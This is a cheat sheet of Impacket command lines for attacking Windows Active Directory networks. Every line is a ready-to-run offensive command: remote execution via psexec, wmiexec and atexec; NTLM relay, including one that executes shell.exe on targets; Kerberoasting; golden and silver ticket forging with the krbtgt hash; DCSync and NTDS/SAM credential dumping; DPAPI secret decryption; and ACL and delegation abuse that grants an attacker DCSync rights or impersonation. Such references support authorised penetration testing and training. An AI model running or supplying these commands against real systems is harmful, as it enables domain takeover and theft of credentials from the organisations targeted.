Impacket Python library with tools for SMB, MSRPC, Kerberos, NTLM, WMI, and AD attacks.
impacket-psexec domain/user:[email protected]
impacket-psexec domain/[email protected] -hashes :NTLMhash
impacket-smbexec domain/user:[email protected]
impacket-wmiexec domain/user:[email protected]
impacket-wmiexec domain/[email protected] -hashes :NTLMhash
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -i
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
impacket-atexec domain/user:[email protected] "whoami /all"
impacket-dcomexec domain/user:[email protected]
impacket-ntlmrelayx -tf targets.txt -smb2support --remove-mic
impacket-ntlmrelayx -t ldaps://DC01 --delegate-access
impacket-ntlmrelayx -t ldaps://DC01 --shadow-credentials --shadow-target victim$
impacket-ntlmrelayx -t http://10.10.10.1/certsrv/certfnsh.asp --adcs --template DomainController
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
impacket-getTGT domain.local/user:password -dc-ip 10.10.10.1
impacket-getST -spn cifs/srv.domain.local domain.local/svc_user:password -impersonate Administrator -dc-ip 10.10.10.1
impacket-getST -spn cifs/target.domain.local -impersonate Administrator "domain.local/EVILPC$" -hashes :NTLMhash -dc-ip 10.10.10.1
impacket-ticketer -nthash SVC_NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn MSSQLSvc/sql.domain.local -user-id 500 administrator
impacket-raiseChild child.domain.local/childadmin:password
impacket-ticketConverter ticket.kirbi ticket.ccache
impacket-describeTicket ticket.ccache
impacket-secretsdump domain/user:[email protected]
impacket-secretsdump domain/[email protected] -hashes :NTLMhash
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
impacket-secretsdump domain/[email protected] -just-dc
impacket-secretsdump domain/[email protected] -just-dc-user krbtgt
impacket-secretsdump domain/[email protected] -use-vss
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-dpapi masterkey -file mkfile -sid S-1-5-21-xxx -password Passw0rd
impacket-dpapi credential -file cred.blob -key 0xDECRYPTED_MASTERKEY
impacket-smbclient domain/user:[email protected]
impacket-smbclient domain/[email protected] -hashes :NTLMhash
impacket-lookupsid domain/user:[email protected]
impacket-rpcdump domain/user:[email protected]
impacket-reg domain/user:[email protected] query -keyName "HKLM\SAM"
impacket-mssqlclient domain/user:[email protected]
impacket-mssqlclient domain/user:[email protected] -windows-auth
impacket-GetADUsers -all domain.local/user:password -dc-ip 10.10.10.1
impacket-samrdump domain/user:[email protected]
impacket-findDelegation domain.local/user:password -dc-ip 10.10.10.1
impacket-services domain/user:[email protected] list
impacket-smbserver share /tmp/share -smb2support
impacket-Get-GPPPassword "domain/user:[email protected]"
impacket-dacledit -action write -rights DCSync -principal attacker -target-dn 'DC=domain,DC=local' domain.local/admin:password
impacket-dacledit -action read -principal attacker -target victimuser domain.local/user:password
impacket-owneredit -action write -new-owner attacker -target victimobject domain.local/user:password
impacket-changepasswd domain.local/[email protected] -newpass NewP@ss1 -altuser attacker -altpass Pass -reset
impacket-addcomputer -computer-name 'EVILPC$' -computer-pass Passw0rd domain.local/user:password -dc-ip 10.10.10.1
impacket-rbcd -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain.local/user:password -dc-ip 10.10.10.1